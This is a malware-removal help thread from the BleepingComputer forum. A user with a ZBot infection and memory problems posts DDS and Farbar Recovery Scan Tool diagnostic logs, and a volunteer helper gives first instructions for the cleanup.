Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

ZBot, COM Surrogate, and all kinds of memory issues.


  • This topic is locked This topic is locked
9 replies to this topic

#1 prefect

prefect

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:02:13 PM

Posted 23 August 2014 - 12:14 PM

Background: On Wednesday I was infected with ZBot. After taking steps to remove the malware with Norton and MalWare removal programs, I think the infection is gone (well, if not, you'll notice before me). I made this topic

 

Since then, my computer's memory and CPU usage have been crippled. I can't open Chrome without hanging windows, and if I open more than one tab, I run the risk of crashing it. Opening a YouTube video crashes Shockwave. In Task Manager, COM Surrogate processes keep opening and eating memory. I've always had a memory leak, but now its to the point where I can't use my computer. This has made things like checking Windows Update difficult as COM Surrogate eats too much memory for it to open. I can open it by killing enough processes, but they come right back. I tried installing a backlog of Updates, but I get the "Windows could not configure updates, reverting." Due to the number of updates, trying again is very time consuming to bother trying again just now. 

 

In the topic I made, I was advised to run RKill:

 

 

Execution time: 0 hours(s), 26 minute(s), and 53 seconds(s)

First - For Rkill the times should not run much over 2 minutes. (the 53 seconds is about average)

If it ever runs over 20 minutes then you do seem to have a problem ..........

I just ran a check on my Windows 8, and it took 0 hours(s), 1 minute(s), and 3 seconds(s).

 

 

 

Upon seeing that, I was told to post here... see the appropriate reports.

 

DDS (Ver_2012-11-20.01) - NTFS_AMD64 
Internet Explorer: 10.0.9200.16519
Run by Stephen at 12:34:06 on 2014-08-23
Microsoft Windows 8  6.2.9200.0.1252.1.1033.18.3798.607 [GMT -4:00]
.
AV: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Norton Internet Security *Disabled/Outdated* {D87FA2C0-F526-77B1-D6EC-0EDF3936CEDB}
SP: Norton Internet Security *Disabled/Outdated* {631E4324-D31C-783F-EC5C-35AD42B18466}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Norton Internet Security *Disabled* {E04423E5-BF49-76E9-FDB3-A7EAC7E589A0}
.
============== Running Processes ===============
.
C:\windows\system32\svchost.exe -k DcomLaunch
C:\windows\system32\svchost.exe -k RPCSS
C:\windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\windows\system32\svchost.exe -k netsvcs
C:\windows\system32\dwm.exe
C:\windows\system32\svchost.exe -k LocalService
C:\windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Program Files\Classic Shell\ClassicShellService.exe
C:\Program Files\Tablet\Pen\WTabletServiceCon.exe
C:\windows\system32\svchost.exe -k NetworkService
C:\windows\system32\WLANExt.exe
C:\windows\System32\spoolsv.exe
C:\windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\windows\system32\dashost.exe
C:\Program Files (x86)\Samsung\Settings\CmdServer\EasyLauncher.exe
C:\Program Files\Intel\WiFi\bin\EvtEng.exe
C:\Program Files\Condusiv Technologies\ExpressCache\ExpressCache.exe
C:\Program Files\Intel\iCLS Client\HeciServer.exe
C:\windows\SysWOW64\irstrtsv.exe
C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
C:\windows\system32\svchost.exe -k imgsvc
C:\Program Files\Windows Defender\MsMpEng.exe
C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
C:\windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\windows\system32\wbem\unsecapp.exe
C:\windows\system32\wbem\wmiprvse.exe
C:\windows\system32\wbem\wmiprvse.exe
C:\windows\system32\taskhostex.exe
C:\Program Files (x86)\Intel\irstrt\RapidStartConfig.exe
C:\Program Files\Classic Shell\ClassicStartMenu.exe
C:\windows\Explorer.EXE
C:\Program Files (x86)\Samsung\Settings\CmdServer\EasySettingsCmdServer.exe
C:\Program Files\Tablet\Pen\Pen_TabletUser.exe
C:\Program Files\Tablet\Pen\WacomHost.exe
C:\Program Files\Tablet\Pen\Pen_Tablet.exe
C:\Program Files\Tablet\Pen\Pen_TouchUser.exe
C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.0.1114.318_x64__8wekyb3d8bbwe\LiveComm.exe
C:\Program Files\Common Files\microsoft shared\ink\TabTip.exe
C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\TabTip32.exe
C:\windows\system32\SearchIndexer.exe
C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe
C:\windows\system32\igfxext.exe
C:\Program Files (x86)\Samsung\Settings\sSettings.exe
C:\Program Files (x86)\Samsung\SW Update\SWMAgent.exe
C:\Windows\System32\hkcmd.exe
C:\Windows\System32\igfxpers.exe
C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
C:\Windows\System32\rundll32.exe
C:\Program Files\Elantech\ETDCtrl.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe
C:\Users\Stephen\AppData\Roaming\Google\Google Talk\googletalk.exe
C:\Program Files\Elantech\ETDCtrlHelper.exe
C:\Users\Stephen\AppData\Roaming\Dropbox\bin\Dropbox.exe
C:\Program Files (x86)\Intel\IntelAppStore\bin\ismagent.exe
C:\windows\syswow64\dllhost.exe
C:\Program Files\Samsung\S Agent\CommonAgent.exe
C:\windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Program Files\Intel\BluetoothHS\BTHSAmpPalService.exe
C:\Program Files\Intel\BluetoothHS\BTHSSecurityMgr.exe
C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe
C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\ccSvcHst.exe
C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\ccSvcHst.exe
C:\Program Files\Samsung\Recovery\WCScheduler.exe
C:\windows\syswow64\dllhost.exe
C:\windows\syswow64\dllhost.exe
C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\windows\syswow64\dllhost.exe
C:\windows\system32\taskmgr.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\windows\syswow64\dllhost.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\windows\system32\RunDll32.exe
C:\windows\syswow64\dllhost.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\windows\syswow64\wwahost.exe
C:\windows\syswow64\dllhost.exe
C:\windows\syswow64\dllhost.exe
C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\Bootstrap.exe
C:\windows\syswow64\dllhost.exe
C:\windows\syswow64\dllhost.exe
C:\windows\syswow64\dllhost.exe
C:\windows\syswow64\dllhost.exe
C:\windows\syswow64\dllhost.exe
C:\windows\syswow64\dllhost.exe
C:\windows\syswow64\dllhost.exe
C:\windows\syswow64\dllhost.exe
C:\windows\syswow64\dllhost.exe
C:\windows\syswow64\dllhost.exe
C:\windows\syswow64\dllhost.exe
C:\windows\syswow64\dllhost.exe
C:\windows\syswow64\dllhost.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\windows\System32\svchost.exe -k WerSvcGroup
C:\windows\syswow64\dllhost.exe
C:\windows\syswow64\dllhost.exe
C:\windows\syswow64\dllhost.exe
C:\windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://search.conduit.com?SearchSource=10&CUI=UN47387223475202034&UM=2&ctid=CT3289663
uDefault_Page_URL = hxxp://samsung13.msn.com
mWinlogon: Userinit = userinit.exe
BHO: ExplorerBHO Class: {449D0D6E-2412-4E61-B68F-1CB625CD9E52} - C:\Program Files\Classic Shell\ClassicExplorer32.dll
BHO: Norton Identity Protection: {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\coieplg.dll
BHO: Norton Vulnerability Protection: {6D53EC84-6AAE-4787-AEEE-F4628F01010C} - C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\ips\ipsbho.dll
BHO: Groove GFS Browser Helper: {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL
BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL
BHO: ClassicIE9BHO Class: {EA801577-E6AD-4BD5-8F71-4BE0154331A4} - C:\Program Files\Classic Shell\ClassicIE9DLL_32.dll
TB: Classic Explorer Bar: {553891B7-A0D5-4526-BE18-D3CE461D6310} - C:\Program Files\Classic Shell\ClassicExplorer32.dll
uRun: [googletalk] C:\Users\Stephen\AppData\Roaming\Google\Google Talk\googletalk.exe /autostart
uRun: [GoogleChromeAutoLaunch_7658F97A8AE129BDD15C9751079A5083] "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-startup-window
uRun: [Skype] "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
uRun: [Dailtyqovoyxivw] C:\Users\Stephen\AppData\Roaming\Niuzdoky\woivomk.exe
mRun: [RemoteControl10] "C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe"
mRun: [Adobe Reader Speed Launcher] "C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe"
mRun: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
mRun: [Norton Online Backup] C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe
mRun: [Intel AppUp(SM) center] "C:\Program Files (x86)\Intel\IntelAppStore\bin\ismagent.exe" --domain-id F0399437-FD0C-4A48-B101-F0314A6172E4
mRun: [Intel AppUp® center] "C:\Program Files (x86)\Intel\IntelAppStore\bin\ismagent.exe" --domain-id F0399437-FD0C-4A48-B101-F0314A6172E4
mRun: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
mRun: [BCSSync] "C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe" /DelayServices
mRun: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
mRun: [TrojanScanner] C:\Program Files (x86)\Trojan Remover\Trjscan.exe /boot
StartupFolder: C:\Users\Stephen\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk - C:\Users\Stephen\AppData\Roaming\Dropbox\bin\Dropbox.exe
uPolicies-Explorer: NoDriveTypeAutoRun = dword:145
IE: E&xport to Microsoft Excel - C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE/3000
IE: Se&nd to OneNote - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll/105
IE: Send to Bluetooth - C:\Program Files (x86)\Intel\Bluetooth\btSendToObject.htm
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
IE: {56753E59-AF1D-4FBA-9E15-31557124ADA2} - C:\Program Files\Classic Shell\ClassicIE9_32.exe
IE: {64964764-1101-4bbd-8891-B56B1A53B9B3} - {553891B7-A0D5-4526-BE18-D3CE461D6310}
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
TCP: NameServer = 192.168.1.1 71.252.0.12
TCP: Interfaces\{00D8F6C9-C81F-4E7F-ADC0-ED2F4BF3EBB8} : DHCPNameServer = 192.168.1.1 71.252.0.12
TCP: Interfaces\{00D8F6C9-C81F-4E7F-ADC0-ED2F4BF3EBB8}\16A637F57657563747 : DHCPNameServer = 192.168.254.1
TCP: Interfaces\{00D8F6C9-C81F-4E7F-ADC0-ED2F4BF3EBB8}\2656C6B696E6E2166636 : DHCPNameServer = 192.168.2.1
TCP: Interfaces\{00D8F6C9-C81F-4E7F-ADC0-ED2F4BF3EBB8}\44A4850503 : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{00D8F6C9-C81F-4E7F-ADC0-ED2F4BF3EBB8}\B41627964716358616E64756A7 : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{00D8F6C9-C81F-4E7F-ADC0-ED2F4BF3EBB8}\D465E46403 : DHCPNameServer = 192.168.1.1 71.252.0.12
Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
SSODL: WebCheck - <orphaned>
SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\36.0.1985.143\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
x64-BHO: ExplorerBHO Class: {449D0D6E-2412-4E61-B68F-1CB625CD9E52} - C:\Program Files\Classic Shell\ClassicExplorer64.dll
x64-BHO: Groove GFS Browser Helper: {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL
x64-BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL
x64-BHO: ClassicIE9BHO Class: {EA801577-E6AD-4BD5-8F71-4BE0154331A4} - C:\Program Files\Classic Shell\ClassicIE9DLL_64.dll
x64-TB: Classic Explorer Bar: {553891B7-A0D5-4526-BE18-D3CE461D6310} - C:\Program Files\Classic Shell\ClassicExplorer64.dll
x64-Run: [IgfxTray] C:\windows\System32\igfxtray.exe
x64-Run: [HotKeysCmds] C:\windows\System32\hkcmd.exe
x64-Run: [Persistence] C:\windows\System32\igfxpers.exe
x64-Run: [RtHDVCpl] C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
x64-Run: [BTMTrayAgent] rundll32.exe "C:\Program Files (x86)\Intel\Bluetooth\btmshell.dll",TrayApp
x64-Run: [ETDCtrl] C:\Program Files (x86)\Elantech\ETDCtrl.exe
x64-IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll
x64-IE: {56753E59-AF1D-4FBA-9E15-31557124ADA2} - C:\Program Files\Classic Shell\ClassicIE9_32.exe
x64-IE: {64964764-1101-4bbd-8891-B56B1A53B9B3} - {553891B7-A0D5-4526-BE18-D3CE461D6310}
x64-IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
x64-Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
x64-Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - <orphaned>
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - <orphaned>
x64-Notify: igfxcui - igfxdev.dll
x64-SSODL: WebCheck - <orphaned>
x64-SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL
.
============= SERVICES / DRIVERS ===============
.
R3 AMPPAL;Intel® Centrino® Wireless Bluetooth® + High Speed Virtual Adapter;C:\windows\System32\Drivers\AmpPal.sys [2012-7-16 162344]
R3 BHDrvx64;BHDrvx64;C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\Definitions\BASHDefs\20130208.001\BHDrvx64.sys [2013-2-12 1388120]
R3 BthLEEnum;Bluetooth Low Energy Driver;C:\windows\System32\Drivers\BthLEEnum.sys [2012-7-25 202752]
S3 AMPPALP;Intel® Centrino® Wireless Bluetooth® + High Speed Protocol;C:\windows\System32\Drivers\AmpPal.sys [2012-7-16 162344]
.
=============== File Associations ===============
.
FileExt: .txt: txtfile=C:\windows\System32\NOTEPAD.EXE %1 [UserChoice]
.
=============== Created Last 30 ================
.
2014-08-23 16:07:21 75888 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{576D219F-5432-4235-80D3-86037A80A278}\offreg.dll
2014-08-23 15:43:33 78168 ----a-w- C:\windows\SysWow64\FlashPlayerCPLApp.cpl
2014-08-23 15:43:33 692568 ----a-w- C:\windows\SysWow64\FlashPlayerApp.exe
2014-08-23 13:37:50 11319192 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{576D219F-5432-4235-80D3-86037A80A278}\mpengine.dll
2014-08-23 13:08:08 -------- d-----w- C:\Program Files (x86)\Cisco
2014-08-23 13:07:55 -------- d-----w- C:\ProgramData\Intel.sav
2014-08-23 00:11:20 270496 ------w- C:\windows\System32\MpSigStub.exe
2014-08-22 20:16:31 144896 ----a-w- C:\windows\System32\tssdisai.dll
2014-08-22 16:38:29 2560 ----a-w- C:\Users\Stephen\AppData\Local\53534DF0.exe
2014-08-22 13:01:05 -------- d-----w- C:\Program Files (x86)\ESET
2014-08-21 22:59:39 -------- d-----w- C:\Program Files\CCleaner
2014-08-21 20:08:50 -------- d-----w- C:\NPE
2014-08-21 20:01:26 -------- d-----w- C:\Users\Stephen\AppData\Local\NPE
2014-08-21 16:40:46 -------- d-----w- C:\ProgramData\Licenses
2014-08-21 16:36:48 -------- d-----w- C:\ProgramData\Simply Super Software
2014-08-21 16:36:47 -------- d-----w- C:\Program Files (x86)\Trojan Remover
2014-08-21 16:35:14 -------- d-----w- C:\Users\Stephen\AppData\Local\Programs
2014-08-18 03:30:47 -------- d-----w- C:\Program Files\iPod
2014-08-18 03:30:45 -------- d-----w- C:\ProgramData\34BE82C4-E596-4e99-A191-52C6199EBF69
2014-08-18 03:30:45 -------- d-----w- C:\Program Files\iTunes
2014-08-18 03:30:45 -------- d-----w- C:\Program Files (x86)\iTunes
.
==================== Find3M  ====================
.
2014-07-08 18:10:15 11204096 ----a-w- C:\windows\SysWow64\FlashPlayerInstaller.exe
.
============= FINISH: 12:57:24.47 ===============
 

Attached Files



BC AdBot (Login to Remove)

 


#2 xXToffeeXx

xXToffeeXx

    Bleepin' Polar Bear


  • Malware Response Instructor
  • 6,054 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:The Arctic Circle
  • Local time:07:13 PM

Posted 23 August 2014 - 12:18 PM

Greetings and :welcome: to BleepingComputer,
My name is xXToffeeXx, but feel free to call me Toffee if it is easier for you. I will be helping you with your malware problems.
 
A few points to cover before we start:

  • Do not run any tools without being instructed to as this makes my job much harder in trying to figure out what you have done.
  • Make sure to read my instructions fully before attempting a step.
  • If you have problems or questions with any of the steps, feel free to ask me. I will be happy to answer any questions you have.
  • Please follow the topic by clicking on the "Follow this topic" button, and make sure a tick is in the "receive notifications" and is set to "Instantly". Any replies should be made in this topic by clicking the "Reply to this topic" button.
  • Important information in my posts will often be in bold, make sure to take note of these.
  • I will attempt to reply as soon as possible, and normally within 24 hours of your reply. If this is not possible or I have a delay then I will let you know.
  • I will bump a topic after 3 days of no activity, and then will give you another 2 days to reply before a topic is closed. If you need more time than this please let me know.
  • Lets get going now :thumbup2:

==========================
 
Hi prefect,
 
Please download Farbar Recovery Scan Tool and save it to your Desktop.
 
Note: You need to run the version compatible with your system. If you are not sure which version applies to your system, download both of them and try to run them. Only one of them will run on your system, that will be the right version.

  • Right-click FRST then click "Run as administrator" (XP users: click run after receipt of Windows Security Warning - Open File).
  • When the tool opens, click Yes to disclaimer.
  • Press the Scan button.
  • When finished, it will produce a log called FRST.txt in the same directory the tool was run from.
  • Please copy and paste the log in your next reply.

Note 2: The first time the tool is run it generates another log (Addition.txt - also located in the same directory the tool was run from). Please also paste that, along with the FRST.txt into your next reply.
 
--------------
 
To recap, in your next reply I would like to see the following. Make sure to copy & paste them unless I ask otherwise:

  • FRST.txt
  • Addition.txt

xXToffeeXx~


~If I am helping you and you have not had a reply from me in two days, please send me a PM~

 

logo-25.pngID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic] - If we have helped you out and you want to support what we do, you can do so here

 

 ~Twitter~ | ~Malware Analyst at Emsisoft~


#3 prefect

prefect
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:02:13 PM

Posted 23 August 2014 - 12:44 PM

Hi Toffee, 

 

Thanks for helping me with this. I'll try to be as responsive as possible. See the reports below.

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 23-08-2014
Ran by Stephen (administrator) on GOINGLAPPY on 23-08-2014 13:40:31
Running from C:\Users\Stephen\Desktop
Platform: Windows 8 (X64) OS Language: English (United States)
Internet Explorer Version 10
Boot Mode: Normal
 
The only official download link for FRST:
Download link from any site other than Bleeping Computer is unpermitted or outdated.
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(IvoSoft) C:\Program Files\Classic Shell\ClassicShellService.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\WTabletServiceCon.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Windows\System32\dasHost.exe
(Samsung Electronics CO., LTD.) C:\Program Files (x86)\Samsung\Settings\CmdServer\EasyLauncher.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Condusiv Technologies) C:\Program Files\Condusiv Technologies\ExpressCache\ExpressCache.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Intel Corporation) C:\Windows\SysWOW64\irstrtsv.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(Intel) C:\Program Files (x86)\Intel\irstrt\RapidStartConfig.exe
(IvoSoft) C:\Program Files\Classic Shell\ClassicStartMenu.exe
() C:\Program Files (x86)\Samsung\Settings\CmdServer\EasySettingsCmdServer.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\Pen_TabletUser.exe
(Samsung Electronics CO., LTD.) C:\Program Files (x86)\Samsung\Settings\sSettings.exe
(Wacom Technology) C:\Program Files\Tablet\Pen\WacomHost.exe
(Samsung Electronics CO., LTD.) C:\Program Files (x86)\Samsung\SW Update\SWMAgent.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\Pen_Tablet.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\Pen_TouchUser.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.0.1114.318_x64__8wekyb3d8bbwe\LiveComm.exe
(Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe
(Intel Corporation) C:\Windows\System32\igfxext.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrl.exe
(Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe
(Google) C:\Users\Stephen\AppData\Roaming\Google\Google Talk\googletalk.exe
(Dropbox, Inc.) C:\Users\Stephen\AppData\Roaming\Dropbox\bin\Dropbox.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrlHelper.exe
(Samsung Electronics CO., LTD.) C:\Program Files\Samsung\S Agent\CommonAgent.exe
(Intel Corporation) C:\Program Files (x86)\Intel\IntelAppStore\bin\ismagent.exe
(Intel Corporation) C:\Program Files\Intel\BluetoothHS\BTHSAmpPalService.exe
(Intel® Corporation) C:\Program Files\Intel\BluetoothHS\BTHSSecurityMgr.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\ccsvchst.exe
(Symantec Corporation) C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\ccsvchst.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_6.2.9200.16683_none_62280e15510f8e79\TiWorker.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\SoftwareDistribution\SelfUpdate\Handler\wusetupv.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13191312 2012-08-07] (Realtek Semiconductor)
HKLM\...\Run: [BTMTrayAgent] => rundll32.exe "C:\Program Files (x86)\Intel\Bluetooth\btmshell.dll",TrayApp
HKLM\...\Run: [ETDCtrl] => C:\Program Files\Elantech\ETDCtrl.exe [2862448 2012-08-05] (ELAN Microelectronics Corp.)
HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [97392 2012-08-15] (CyberLink Corp.)
HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe [40312 2014-05-08] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Norton Online Backup] => C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe [2994880 2012-08-14] (Symantec Corporation)
HKLM-x32\...\Run: [Intel AppUp(SM) center] => C:\Program Files (x86)\Intel\IntelAppStore\bin\ismagent.exe [156000 2012-09-18] (Intel Corporation)
HKLM-x32\...\Run: [Intel AppUp® center] => C:\Program Files (x86)\Intel\IntelAppStore\bin\ismagent.exe [156000 2012-09-18] (Intel Corporation)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43816 2014-07-31] (Apple Inc.)
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [91520 2010-01-21] (Microsoft Corporation)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-08-01] (Apple Inc.)
